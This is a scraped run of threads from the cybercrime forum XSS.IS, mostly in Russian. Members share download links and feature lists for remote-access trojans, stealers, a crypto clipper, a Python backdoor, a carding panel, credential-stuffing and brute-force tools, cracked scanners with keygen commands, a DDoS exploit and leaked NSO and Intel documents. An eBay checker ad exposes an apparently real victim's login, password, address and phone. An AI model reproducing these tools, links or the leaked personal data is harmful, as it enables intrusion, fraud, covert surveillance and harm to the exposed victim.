Особенности MobiHok v6 RAT: Получить пропуск facebook (виртуальная форма) Получить пропуск google (виртуальная форма) Запись телефонных звонков или других звонков, таких как Skype, Messenger (Запись микрофона) Версии Android Работает на всех версиях устройств Android и без необходимости в ROOT Нет требуется root-доступ. Установите новые APK-файлы и обновите вредоносное ПО. Скопируйте файлы с устройства на компьютер. Просмотрите все сообщения на устройстве. Прослушайте звонки, сделанные на устройстве. Список всех контактов на устройстве. Слушайте в прямом эфире или записывайте звук с микрофона устройства. камера на устройстве Получение номера IMEI, MAC-адреса Wi-Fi и сведений об операторе сотовой связи Получение последнего местоположения устройства по GPS Выполнение вызовов на устройстве
You must have at least 40 message(s) to view the content.
Для участников форума "XSS.IS" | Эксклюзивные
Специальная утечка израильской компании NSO Group специально для шпионского ПО PEGASUS Spyware на телефонах Android и iPhone.
![](/proxy.php?image=https%3A%2F%2Fcitizenlab.ca%2Fwp- content%2Fuploads%2F2018%2F09%2FHide-and-Seek- Figure-1.png&hash=e8e98bfa46aa865535ab77f00c8dd226)
100-страничный PDF-файл, содержащий конфиденциальную и конфиденциальную информацию об использовании шпионской программы и технологиях, а также набор документов, которые были сфотографированы с подробными подробностями.
Надеюсь, эта книга вам поможет
ссылка для скачивания:
NSO Group Secret
File
**Netsparker Standard 5.9 - 30th of September 2020
Пароль:** h0nus-reign
Взято с рейда, для тех, кто не хочет тратить кредиты для открытия ссылки
NEW FEATURES
Added a new signature limit for URL Rewrite matched links
Added a crawling limit for Not found (404) links
Added a WASC Classification Report template
Added an option to exclude authentication pages and removed authentication related regexes from the default settings
NEW SECURITY CHECKS
Added Out-of-date security checks for the Liferay portal
Added Version Disclosure and Out-of-date security checks for Jolokia
Added Nested XSS security checks
Added an ASP.NET Razor SSTI security check
Added a Java Pebble SSTI security check
Added a Theymeleaf SSTI security check
Added Version Disclosure and Out-of-date security checks for Grafana
IMPROVEMENTS
Improved custom scripting to send raw requests
Improved the authenticator to hide passwords in request data in order to prevent exposing them in reports
Added an Auto Follow Redirect setting to the Advanced settings
Added request and response details to Out of Band vulnerabilities
Improved logging for timed out regexes in the Javascript Library Checker
Updated signature of Stack Trace/Custom Stack Trace (Python)
Improved the memory consumption on long running scans
FIXES
Fixed an error that was caused when parsing duplicate response content-type headers
Updated Netsparker logos, splash screen and icons
Fixed reporting of Crawl Performance for crawl-only scans
Fixed an issue where Form Value Errors were occurring after simulation was finished
Fixed the Maximum Body Length exceeded log message
Fixed the log level of the Dom Parser's ignored link message
Fixed the Jira Send To application description
Fixed an issue that occured when the content-type and accept header was used in a parameter in the Open API (Swagger) file
Fixed an issue where the custom Comparison Report was not generated
Fixed an ArgumentNullException that was occuring in the TestSiteConfiguration dialog
Disabled the LFI button for possible xxe
Fixed a certificate error problem on the new ssl checker
Fixed the timezone problem on reports
Fixed the Executive Summary Report title
Fixed an ArgumentException that was thrown when the URI was empty
Fixed HIPAA classification links
Fixed the issue where the Netsparker session importer did not import all links from the session
Fixed the bug where the URL was split incorrectly when a segment contained the file extension
Fixed the issue responses that were not being analyzed in the Signatures engine during the re-crawl phase
Fixed the HIPAA classification link when there are multiple classifications
Removed plugin functions that are used to detect bootstrap to prevent false positive versions from being reported
Fixed NRE in the static detection engine
Fixed the Swagger parser that caused an object to be imported with a parent node while the object was inside an arrayClick to expand...
Скачать: http://www.mediafire.com/file/smut4...tandard_5.9_-_30th_of_September_2020.zip/file
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/HzoVlAab#XXWrZo1rui7hlW7MNFfyRMI42xSxvWiUmMqoK23jMQc)
mega.nz
Приветствую! Поделитесь, пожалуйста, закрытыми источниками, где раньше всего публикуется лекарство для софта. Заранее спасибо!
Всем привет. Мне нужен андроид программист. Я хочу установить нового Android- Bankbot. Сколько денег мне на это нужно? Скрытая bot вроде как Cerberus и Alien
доброго времени суток!
ищу sip tools крякнутый
софт для голосовых рассылок,подмены номера,озвучки текста при звонке и т.д.
может кто встречал ломанную??
могу взамен дать для рассылок голосовых через 3g-модем софт.
Инструменты для работы в Telegram
- Парсер юзеров
- Спам в ЛС
- Контакты аккаунта
- Чеккер аккаунтов
Tech: html / js
You must have at least 10 reaction(s) to view the content.
DomainCounter - Очередной сортировщик доменов)
+Быстрый.
+Работает с любым количеством файлов.
+Работает с файлами любого размера.
+Максимально простой интерфейс.
+Фильтр результатов. Например если вы хотите, что бы в статистике отобразились
только домены кол-во которых будет выше N числа.
-DEMO версия ОЧЕНЬ медленно сортирует базу на файлики.
Spoiler: DEMO
Hidden content for authorized users.
closed
![](/proxy.php?image=https%3A%2F%2Fportswigger.net%2Fcontent%2Fimages%2Flogos%2Fburpsuite- twittercard.png&hash=63dfddd19a1a9ca27917dae70ffdc115)
Скачать: https://mega.nz/folder/DrpmnaiY#tnVW-A_eaxy95kxoDlTuBw
Contents:
- Apollo Lake TXE Release
- Intel Automated Power Switch Software
- Intel HDCP Root Certificate
- Intel Lakefield PETS (Platform Enablement Test Suite)
magnet:?xt=urn:btih:718b60f839b9bce952ab259f2b78691bb544fe3c&dn=Intel%20exconfidential%20Lake%20drop%201.5
https://mega.nz/folder/mUlHXJoC#sJqFDk01hBeDYKw2nugUZA
mirror link
](https://anonfiles.com/TbN9jcL8o4/exconfidential_Lake_drop_1.5_zip)
anonfiles.com
**Acunetix Web Vulnerability Scanner Version 13 (build 13.0.200715107 – Windows) + Patch
Acunetix Web Vulnerability Scanner **— это сканер уязвимостей, который позволяет искать ошибки в сценариях на языках PHP, ASP и ASP.NET. Помимо этого, программа может проверять на ошибки сценарии на JavaScript. Тесты сайтов можно проводить не только напрямую, но и через HTTP или SOCKS прокси- сервер - для обеспечения анонимности.
New Features
New Vulnerability Checks
Updates
Fixes
Скачать:
](http://www.mediafire.com/file/4br7nv2y9duyrq3/Acunetix_13.0.200715107.7z/file)
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
VirusTotal:
](https://www.virustotal.com/gui/url/242c3a33ceb58676a66707fe3d6196df40f4b46f97bdf64c9b92c9e46d007758/detection)
VirusTotal
www.virustotal.com
Здравствуй
Я не знаю, правильный ли это раздел, переместите ветку на правильный, если я
запутался.
Я ищу подробную информацию о ragnar_locker "RagnarLocker" ransonware, ищу
MicroXP v0.82, файлы, которые он генерирует в папке
"%PROGRAMFILES (X86)%\VirtualAppliances"
Вы знаете какие-либо IP CC?
Мне был бы интересен какой-нибудь источник, даже если бы это был какой-то
предыдущий вариант.
Извините за мой плохой английский.
большое спасибо
======================
Looking for details of the ragnar_locker "RagnarLocker" ransonware
Hi
I don't know if it is the correct section, please move the thread to the correct one if I got confused.
I am looking for details of the ragnar_locker "RagnarLocker" ransonware,
looking for MicroXP v0.82, the files it generates in the folder "%PROGRAMFILES
(X86)%\VirtualAppliances"
Do you know any IP CCs?
I would be interested in some source, even if it was some previous option.
Sorry for my bad english.
Thanks a lot
Помогите найти чекер номеров телефона на валид. Буду очень признателен, спасибо за внимание. Благодарю за любую информацию по данному вопросу
Скачать
You must have at least 1 reaction(s) to view the content.
**IDA Pro 7.3 Team-IRA Release v1.0 (July 2020)
Описание:
IDA Pro** - это интерактивный дизассемблер и отладчик. Она позволяет
превратить бинарный код программы в ассемблерный текст, который может быть
применен для анализа работы программы.
Название IDA Pro происходит от английского Interactive Disassembler. IDA
используется для анализа вирусов (antivirus companies), исследования защит
систем (software security auditing), обратной инженерии (reverse engineering).
Хотя IDA и не является декомпилятором (decompiler), она содержит отладчик
(debugger) и может анализировать программы на высоком уровне.
Платформа: Windows x64
Скачать: https://www18.zippyshare.com/v/tX6xZU2H/file.html
Что нового в 7.3: https://www.hex-rays.com/products/ida/news/7_3/
Источник информации: https://www.at4re.net/f/thread-1923.html
Пароль: xss.is
Что нового: https://www.hex-rays.com/products/ida/news/7_5/
Скачать:
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
Yh4t8QYduLW9qQt5GgLG_TBYJfYwqWkKQ2xWBwM)
mega.nz
Есть ли тут люди которые с iPhone на ей ты.
Может кто-то знает как можно обойти apple сервис, что откатится ios ПО?
Где то можно найти ломаную версию или купить?
Есть два просто идеальных варианта
AIO [Multi CMS BruteForce]
Multi CMS Brute Force
ссыли на видосы
Может кто встречал на своем темном пути данные софтины. Буду благодарен
Why is cobalt strike so relevant among blackhat hackers and APTs groups? is it any different from metasploit or empire frameworks?
Burp Suite Professional 2020.11 [Released 09 November 2020]
Spoiler: Что нового:
The new message inspector is a collapsible panel displayed on the right-hand side of the message editor throughout Burp Suite. It provides a quick way to analyze and work with interesting features of HTTP and WebSocket messages without having to switch between different tabs.
![](/proxy.php?image=https%3A%2F%2Fportswigger.net%2Fcms%2Fimages%2Fd6%2F49%2F876f-article- inspector-screenshot_%281%29.png&hash=23007b238a95bf321ad9ace650e25cb3)
The Hex, Params, Headers, and Cookies tabs that used to appear in the message editor have been removed. You can now access the same functionality, and some additional new features, directly in the inspector panel.
You perform some of these actions by drilling down into items that were automatically identified by the inspector. Alternatively, you can manually select one or more characters in a message to work with them in the inspector panel.
For more information about using the inspector, please refer to the [documentation](https://portswigger.net/burp/documentation/desktop/functions/message- editor/inspector.html).
Burp Scanner is now able to scan both JSON and YAML-based APIs for vulnerabilities. By default, the crawler attempts to parse any API definitions that it encounters to identify potential endpoints, along with their supported methods and parameters. You can also explicitly provide the URL of an API definition when launching a scan. Based on the endpoints that it discovers, Burp Scanner is then able to derive new locations to crawl and audit.
If you prefer, you can disable API scanning by deselecting the "Parse API definitions" crawl option in your scan configuration. You can find this option under "Miscellaneous".
Please note that this initial release only supports scanning of a fairly limited range of REST APIs. For a full list of the prerequisites and limitations, please refer to the [documentation](https://portswigger.net/burp/documentation/desktop/scanning/api- scanning.html). We plan to further develop this feature and gradually add support for a wider range of APIs in future releases.
In the previous release, we added new functionality for recording and uploading full login sequences to help Burp Scanner handle more complex authentication mechanisms. This release adds a new feature that allows you to replay your recorded login sequences in an embedded browser.
This makes it much easier to check whether the recording accurately captured your browser interactions. It may also help you to diagnose any problems if the login sequence is failing during scans.
For more information, please refer to the [documentation](https://portswigger.net/burp/documentation/desktop/scanning/recorded- logins.html).
By default, Burp now automatically downloads any available updates. When a new update has been downloaded, a notification will prompt you to restart Burp in order to install it. Note that you will still need to download the 2020.11 release manually.
If you prefer, you can disable automatic updates in the user options.
To support automatic updates, Burp can no longer be installed in a directory that requires admin privileges. As a result, installing 2020.11 on Windows will likely create a new instance of Burp rather than upgrading your existing installation. Unfortunately, this means you will have to manually uninstall your old version of Burp.
This is a one-off inconvenience. Upgrading to any subsequent releases will not require you to repeat this process.
To help reduce clutter, the custom views that some Burp extensions add to the message editor are no longer accessed via individual tabs. Instead, you can now alternate between your extension-specific views using a new drop-down menu.
Hi guys, where can I buy the new version of Loki stealer? If you have an old version can you share it? I want to examine
В поисках готового продукта для чека ФБ по кукам или же ищу кто сможет
реализовать данный софт
Цены или какую либо инфу прошу под ник =) всем Добра =)
reverse socket 4.**
исходный код написан на с++
линк: https://www.sendspace.com/file/wm3kdj
вес ехешника 11 кб.
пароль на архив: xss.is
Hidden content for authorized users.
FarFar.CoM.zip - AnonFiles ](https://anonfiles.com/x518y354o7/Phone_Number_Finder_Internet_Pro_v5.4.3.28_Full_Activated_- _WwW.Dr-FarFar.CoM_zip)
anonfiles.com
Hidden content for authorized users.
](https://anonfiles.com/V0P1Za34oe/Instagram_Reg_Checker_Update_zip)
anonfiles.com
Hidden content for authorized users.
Hidden content for authorized users.
MzCusrXgdiZA/view?usp=sharing)
drive.google.com
I just found this leak around, thought to share with community.
[LIKES = 5] https://drive.google.com/drive/folders/1fjxpOUcKyGEyntUuCDNMQlv0c5MHKRuy?usp=sharing [/ LIKES]
Thanks
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/7gYXQYJI#mEiJITUsq7dhG2TEH_mUKtWcrXUusw-bdF9VChBW0bI)
mega.nz
Ищу minacriss tools подскажите где искать?
Don't need more for cracking
Hidden content for authorized users.
OB 1.4.4 Anomaly: https://anonfiles.com/5bI7V136o2/Anomaly_OB_zip
BlackBullet 2.5.1: https://anonfiles.com/ZfJeV63do6/BlackBullet_2.5.1_zip
Sentry MBA 1.5.0: https://anonfiles.com/t1McVc35ob/Sentry_MBA_1.5.0_Latest_Version_zip
STORM 2.6.0.2: https://anonfiles.com/X6OeV639o7/STORM_v2.6.0.2_zip
[/ hide]
Решил поделиться данной реализацией, может будет кому-нибудь полезно взять для
себя что-то новое.
Можно что-то допилить/изменить на свой вкус и цвет.
Исходник загрузчика можно посмотреть здесь:
https://github.com/r3xq1/MassLoaderBuilder
Так же если у вас есть какие-то идеи, можете делиться)
P.S: Более подробная информация по загрузчику на самом гите.
Добро пожаловать,
Установитe Java (SE 11) :
[ https://www.oracle.com/java/technologies/javase/jdk11-archive-downloads.html ](https://www.oracle.com/java/technologies/javase/jdk11-archive- downloads.html)
Скачать файл : https://mega.nz/file/JxFxTQIC#9bMYU5h_s6mVET1ELxlbnqI6_eq8U4MfQJ0F4m6lXAw
чтобы активировать новый BurpSuite (version 2.4) Откройте CMD И введите команды
java -Dfile.encoding=utf-8 -noverify -javaagent:burp-loader-keygen-2020_4.jar -jar burpsuite_pro_v2020.4.jar
Откройте другой CMD И введите команды : java -jar 2020_2_1-burp-loader- helper.jar
Скопируйте код активации
Остальная часть процесса стандартная, ручная активация и т. Д.
Не забудьте нажать « Like ? »
Это бесплатно ♥
Compiled MemCrashed DDoS V4.0
Official Post: https://github.com/649/Memcrashed-DDoS-Exploit
Download:
https://mega.nz/file/RI5ghaRb#AbGMDasPA-7YStEtsZtCG46SQBFksCERV1K3QE9qRjM
Shodan key swen
ищу иду кряк выше 7.3 версии
Кто нибудь в курсе как сделать такое?
Уже два часа в гугле ищу, но пока ничего конкретного не нашел
Здравствуйте, интересует программа которая на основании ранее выведеных чисел
предугадывала бы последующие числа, в определенном диапазоне чисел, количество
выдающих чисел 6, без повторений, лучше всего чтобы они выстраивались по
возрастанию.
Спасибо
[
https://github.com/3xp0rt/LokiStealer
Click to expand... ](https://github.com/3xp0rt/LokiStealer)
Ничего нового, просто коллекция:
Hidden content for authorized users.
Windows:****
-HichamRAT_v0.9d
-LeGend Rat v1.9 By Ahmed Ibrahim
-LuxNET RAT v1.1.0.4 Cracked
-Mega RAT 1.5 Beta
-Shia Hacker School -Rat v1.0
-Viral RAT 1.0
-Virus Rat v8.0 Beta
-wiRAT v0.1.5F
-Wormins RAT 1.5.3 By WormSystem
-XpertRAT v3.0.10 By Abronsius
-JOKER RAT
-M.A.H ( A few different versions, )
-ORCUS 1.9.1 (+Plugins)
-1.4.1.0 Quasar Golden Edition
-Comet Rat v0.1.4
-DarkComet53
-Diamond RAT
-Kronus RAT
-NingaliNET v1.1.0.0-cracked
-NjRat 0.7D Danger Edition 2018
-NjRat Lime Edition 0.8.0
-PentagonRAT Cracked (2 different versions )
-Quasar 1.3 modified by Deos
-REMCOS v1.7 Professional By Viotto
-Revenge-RAT v0.3
-SlayerRAT v0.7.2 By X-Slayer
-Spy_Byte_Pal
-xena Rat
-cybergate_v3.4.2.2 full private
-Password Stealer For Njrat (от Hidra rat)
-888 RAT Private - Cracked
-Eagle RAT v2.5
-Hidra Force RAT v4.0
-njRAT v0.11G by Dx523
-Ozone C++
-Anti_Globalization RAT
-Dark Connect v3.4
-DarkTrackAlien4.1_Legit_Copy
-Hao Rat - By Noob Dos Scripts (Pretty rare )
-ImSecureRat
-Infinity RAT- Cracked
-NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222 (+ Plugins)
-SaherBlueEagle_Splitter[RAT]
-SpyGate-RAT v0.2.6 [reNew by ExceLLo] + Refud
-WOLF RAT v2.1
-Anti_Globalization RAT 5.3
-CinaRAT
-LimeRAT.0.1.6.1
-LuxNetRat (Doped version other than LuxNET RAT v1.1.0.4 Cracked)
-Rottie3 RAT(Doped)
-RT101
-Shia Core v7.0(tr)
-VayneRat (Doped)
Android:
-SpyNote 2.4.1 [ Android RAT ] 2.4.1 By Scream
-SpyNote3.2
-Spy note 4 and 5
Скачать:
You must spend at least 20 day(s) on the forum to view the content.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/QhJjCS4A#s6iYFipHExOAFl2hxHcU97wd96Ql-2Rvr_kEOFCk7_I)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now!
mega.nz
Клиппер на С++
- подмена кошельков в буфере
- использование атрибута SW_HIDE
- при компиляции укажите флаг -mwindows, чтобы софт запускался без консоли
- переменные в const
Hidden content for authorized users.
пароль: 0JKax&j3%gb2$v2izNY@KW
Инструмент тяжело назвать рабочим, просто под обучение. И помните, кто работает по РУ, к тому приходят по утру.
Привет. Подскажите есть ли IMAP\POP3 email checker, который работает из под
UNIX систем?
Дабы чекать почты на валид, и желательно с поиском по письмам.
Ну в общем аналог All In One Checker.
Всем привет,нашел на соседнем борде чекер гидры, может кому нужен [CLIKE]https://mega.nz/file/I05jHLhI#YuJN_Zg6mqrrahF2uCZd3BnM3CulqCkYEDvCAgcd6SY [/CLIKE]
Забирайте, для меня утратил актуальность
[[CLIKE]Чекер[/CLIKE]](https://mega.nz/file/Z4RRCKIB#_tIWXRAZ-
JK3bOM7b1xOmPEi1ZePkz7YvdNDLfBM0RA)
Вряд ли я чем то смогу помочь ребятам на этом форуме. Но есть очень минималистичный сканер по вашим доркам.
Автоматический поиск SQL иньекций в Google
**
Скачать geckodriver
https://github.com/mozilla/geckodriver/releases
для своей версии ОС и кинуть его файл в папку с программой.
Также, у вас в компе должен быть установлен браузер Mozilla Firefox
Для Windows
pip install selenium
pip install requests
Hidden content for authorized users.
Hidden content for authorized users.
pip install bs4
Для Linux
pip3 install selenium
pip3 install requests
pip3 install bs4
**
В Linux запускать из под не root-пользователя, в каталоге доступном не root-
пользователю
[CLIKE] Скачать [/CLIKE]
ВирусТотал
(софт написан на c# , нечем не накрыт ...)
Скрипт на пайтоне для поиска админ панели
Features
Что Blazy делает:
В основном Blazy пытается обойти регистрационные формы с помощью SQL-инъекции и пытается использовать наиболее распространенные имена пользователей и пароли, если обход не выполняется.
Code:Copy to clipboard
git clone https://github.com/UltimateHackers/Blazy
cd Blazy
pip install -r requirements.txt
python blazy.py
можно увеличить юзер пасс
а так выглядит фейл
**1.Soft is personal, did it on BASE. POST / GET
2.VT -
[CLIKE]https://www.virustotal.com/gui/file...49bfd60c424b082e63681486606c140b662/detection[/CLIKE]
3.Soft: [LIKES =]
[CLIKE]https://drive.google.com/file/d/19Zhxns2Ea6KxXOXbByy5bJeQQRi31eQG/view?usp=sharing[/CLIKE]
[/
LIKES]
-Forums Threads - streams, up to 1000 *
Accounts - your accounts
Accounts are stored here - C: \ InstaBrut
[InstGood.txt](http://instgood.txt/)
Buy PSN Account TELEGRAM** : PSNHAVEN
[CLIKE] https://ufile.io/hzvepnfg [/ CLIKE]
[/CLIKE]
Пресет под апарсер для парсинга ссылок с metacrawler.com
You must have at least 10 message(s) to view the content.
This is the file index of https://Getinmac.com/
They keep the files on a 3rd party server
[CLIKE] https://dl.rjiblog.org/drive/[/ CLIKE][/CLIKE]
The panel itself works fine (Uploading cards, cron) with php5/apache. I dont know if carding the payment gateways still works however. But here's the code, maybe someone else will make better use of it. Installation in simple: Upload files, fill in config.php, run install.php. That's it.
Сама панель прекрасно работает (Uploading cards, cron) с php5/apache. Я не знаю, работает ли при этом блокировка платежных шлюзов. Но вот код, может быть, кто-то другой лучше его использует. Установка в простом виде: Загрузите файлы, заполните файл config.php, запустите install.php. Именно.
Hidden content for authorized users.
](https://www.upload.ee/files/11218939/VoxisFree.zip.html)
VoxisFree.zip - Download. Upload.ee
www.upload.ee
https://www.sendspace.com/file/wpq0zz
не секрет что стандартные порты 3389-3392 очень часто используются на дедиках
, 1 дедик могут угнать
2 это анифрод системы -палят этот порт а следоватеьно это негативно
сказывается на состоянии ордеров
я предлогаяю изменить стандартый порт при помощи командной строки!!!
тут все просто надо ввести желаемый номер порта от 1100 до 65535 главное что
бы он был не занят доугим сервисом!!!
переминуйте фаил txt na bat
Good Look!!!
off
echo -------------------------------------------------
echo - %~nx0
echo -
echo - Allows you to change the RDP port
echo - (Note: RDP default is 3389 0xd3d in hex)
echo -
echo - Here is the current setting (in hex):
reg query "hklm\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v "PortNumber"
echo -------------------------------------------------
:: check admin
net session >nul 2>&1
if %errorLevel% == 0 (echo [Admin confirmed]) else (echo ERR: Admin denied.
Right-click and run as administrator. & pause & goto :EOF)
:: check admin
set /p rdp_port="Change to port to (Press enter for default 3389):"
if "%rdp_port%" EQU "" set rdp_port=3389
echo - Continuing will set it to to %rdp_port%
pause
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d %rdp_port% /f
echo - Here is the new setting (in hex):
reg query "hklm\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v "PortNumber"
echo ---------- Next we will add the port to firewall, then disconnect any
running terminal services
echo ---------- You should be able to reconnect using the new port (if you get
disconnected)
pause
echo -- Adding to firewall rules ...
netsh advfirewall firewall add rule name="RDP Port %rdp_port%" profile=any
protocol=TCP action=allow dir=in localport=%rdp_port%
echo -- Stopping and starting services ...
net stop termservice /yes
net start termservice
ONE
echo ---------- Done
shutdown /r
pause
Сортирует ваши хешики по файлам.
Работаем с большими файлами.
Минимальный интерфейс.
Сворачиваемся в трей.
Ничем не запакован (смотрим говнокоды c#).
Мини-статистика.
Минимальный вес программки.
Принимает
-всечтоугодно:hash
-всечтоугодно:hash:salt
-hash
Демо версия. ненадо писать, что добавить еще хешей и т.д.
Spoiler: HashType
Code:Copy to clipboard
MD5
SHA1
SHA-256
SHA-512
Base64
osCommerce
MD5:salt
MYSQL3
SHA1:salt
MYSQL5
SHA-224
SHA-256:salt
SHA-512:salt
MD5(APR)
phpBB3
WordPress(MD5)
MD5(Unix)
Blowfish(Unix)
Drupal7
Hidden content for authorized users.
View and download from Yandex.Disk
yadi.sk
В общем я чуток решил упросить процесс передачи файлов. Так как сам часто кому-то что-то пересылаю. А это нужно открыть нужный браузер, создать архив, запаролить, отправить, и так далее. И тут еще важно чтобы все было анонимно. Короче я упростил жизнь себе и вам! Написал небольшой bash скрипт. Который автоматом все это делает из командной строки.
На данный момент сделано на базе https://transfer.sh/
Что умеет?
Ну и конечно все opensources.
Установка
Данный файл поместить в /usr/local/bin и дать права на запуск.
Использование
Отправляет файл или директорию (Используя TOR)
sendfile PATH_TO_FILE_OR_DIR
Отправляет файл или директорию (Используя TOR). Данный вариант сделан, к
примеру для того что у вас уже весь трафик уже завернут куда либо и не нужно
дополнительно еще юзать TOR.
sendfile PATH_TO_FILE_OR_DIR --no-proxy
P.S. Если что-то надо приделать, пишите
Ну и нужна ли версия для винды, чтобы можно было через контекстное меню так
делать? (щелчок правой кнопкой мыши) ^_^
I have Arkei source code. DM for it.
EncryptOnClick — это бесплатная утилита, которую можно использовать для шифрования файлов и папок. Приложение обеспечивает хороший уровень безопасности за счёт использования 256-разрядного AES-шифрования.
Ищу человека который умеет криптовать ЕХЕ и/или собирать док файл с макросом!
За всеми деталями сотрудничества обращаться в телеграм @worksupport7
Продам brute-cheker EBAY хорошая скорость рабоет на socks5-4
Log type :
Authorization:
jguiness@hotmail.co.uk:cliokia1993
UserID: traeytony
Address: 150 cherry orchard road birmingham, West Midlands b20 2ng United
Kingdom +44 01212405407
Country: GB
Feedback score: 23
Seller: No
PayPal: No
Credit CC: No
telegram;@Ebaysoft skype;live:ypravila
Sell brute-cheker EBAY good speed running on socks5-4
Даю вам скачать HEX To ASM Converter год назад было нужно моему знакомый человеку, и хочу поделится с вами!
Имя программа: Xss.is - HEX To ASM Converter
Вес: 836 кб
Платформа: Win7/10/Vista
[Download / Скачать](https://www.mediafire.com/file/lwcnjo96ibl4ts9/Xss.is_- _HEX_To_ASM_Converter.rar/file)
MobSF (Mobile Security Framework) - это автоматизированное универсальное мобильное приложение (Android/iOS/Windows) для пентестинга, анализа малвари и оценки безопасности. MobSF способен выполнять статический и динамический анализ.
MobSF поддерживает бинарники мобильных приложений (APK, IPA и APPX), а также сжатый исходный код и предоставляет REST API для интеграции с вашим CI/CD. Динамический анализатор помогает выполнять оценку безопасности во время выполнения и интерактивное инструментальное тестирование.
![](/proxy.php?image=https%3A%2F%2Fuser- images.githubusercontent.com%2F4301109%2F70381680-c732df00-191c-11ea-86dc- fc2ce93af9df.png&hash=cb20b7f0b770445a3dda46e144989765)
Текущая версия v3.0.0 Beta
v3.0.0 Beta Changelog
Скачать:
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F30102273%2Fec45ab80-b46b-11e9-9f7f-6db13d2e8507&hash=2132a059ff8594e487737565b00ac186&return_error=1)
Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dy ](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static a...
github.com
Описание работы было рассмотрено здесь:
](https://medium.com/@kshitishirke/mobile-security-framework-mobsf-static- analysis-df22fcdae46e)
Mobile Security Framework (MobSF) is an automated, open source, all-in-one mobile application (Android/iOS/Windows) pen-testing framework…
medium.com
anonfile.com
Code:Copy to clipboard
function MessageBoxA("user32.dll");
function ExitProcess("kernel32.dll");
MessageBoxA(0, 0, 0, 0);
ExitProcess(0);
А подскажите топик с местной софтиной, которая по списку сайтов ищет sql- инъекции на них, а потом их эксплуатирует.
Hello, I believe in freedom of information. Unfortunately, because I am running maintenance on my website I would like to share some of the engines here.
Здравствуйте! Подскажите аналог BruteXSS, главная задача брутфорс xss по заданному словарю
Нужно написать бота-трояна-рат пофиг. Лишь бы можно было подключить опцию формграббера.ФГ есть,разраб ФГ попросил,чтобы софт поддерживал инжекты.
![Main](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2FBlackRouter%2FPHP- Malware-Scanner%2Fmaster%2FMain.jpg&hash=ad5545b2609961612ab4d35fb5973d1b)
PHP Malware Scanner is a tools for find malware in your php or js and ... files.
Main Features
How to use:
1. Copy your website sources to (site) folder.
2. Run PHP Malware Scanner.exe
3. Select your method from menu.
The Team
Home: <https://github.com/BlackRouter/PHP-Malware-
Scanner/blob/master/README.md>
Download: <https://github.com/BlackRouter/PHP-Malware-
Scanner/releases/tag/1.0.0>
Жовольно полезная софтина, суть проги - это оптимизация повседневных действия, сами понимаете с чем связананых.
Есть и nmap
Сканеры
пробив через шодан
сбор банеров
и прочее
Софтина интересная, пекомендую для ознакомления.
Скачать:
---
install Kali linux dependecies:
vnc-2.0 \
gir1.2-gtksource-3.0 gir1.2-vte-2.91 gir1.2-osmgpsmap-1.0 gir1.2-webkit2-4.0
---
clone the repository:
$ git clone https://github.com/r3vn/badKarma.git
---
install python dependecies:
---
Run
$ chmod +x badkarma.py
$ ./badkarma.py
---
Удачного юзания)
кто знает данную программу указанную в заголовке? буду рад любым ответам,
пожалуйста напишите в телеграмм @moiseyyy
одна буква в названии может быть неверной)) краем уха услышал об этой
программе, предварительно программа используется для входа в банковские
аккаунты
Коллеги у кого есть Decoder IC10.x PHP 5.3 поделитесь пожалуйста!
Буду очень благодарен!
Source: https://github.com/xp4xbox/Python-Backdoor
Manual: https://www.instructables.com/id/Simple-Python-Backdoor/
Функции:
_- Поддержка нескольких клиентов
- Кроссплатформенный сервер
- Встроенный кейлоггер
- Возможность отправить команду всем клиентам
- Возможность снимать скриншоты
- Возможность загрузки / скачивания файлов
- Возможность отправлять сообщения
- Возможность запуска при запуске
- Возможность просмотра файлов
- Возможность сбрасывать информацию о пользователе
- Возможность открыть удаленный cmd
- Возможность отключить диспетчер задач
- Возможность выключения / перезагрузки / блокировки компьютера
- Проверка на несколько экземпляров
- Проверка VM / песочницы
- И еще много функций...
_
У кого есть такой софт или видел где-то напишите) Надо чтоб программа подберала проли к старнице инстаграма.
DarkTrack Alien 4.1
Нативный RAT
Hidden content for authorized users.
](https://www.sendspace.com/file/05mz8h)
Send, Receive, Track & Share Your Big Files with SendSpace file sharing!
www.sendspace.com
пацаны запускайте на виртуалке,дедике. так софт работает норм
](https://mega.nz/#!oXJ2AYAJ!T5PIWweBli2MoC6fN75NUhJNYpwXmuwmmwpZ5RSZ4XY)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
mega.nz
Деобфусцировано, крякнуто
Скачать https://www.sendspace.com/file/sj6nc2
Много думаю расскаызвать не надо про софт.
чейнджлог https://www.netsparker.com/web-vulnerability-scanner/changelog/
PHPkit is a simple PHP based backdoor, leveraging include() and php://input to allow the attacker to execute arbitrary PHP code on the infected server. The actual backdoor contains no suspicious calls such as eval() or system(), as the PHP code is executed in memory by include().
Click to expand...
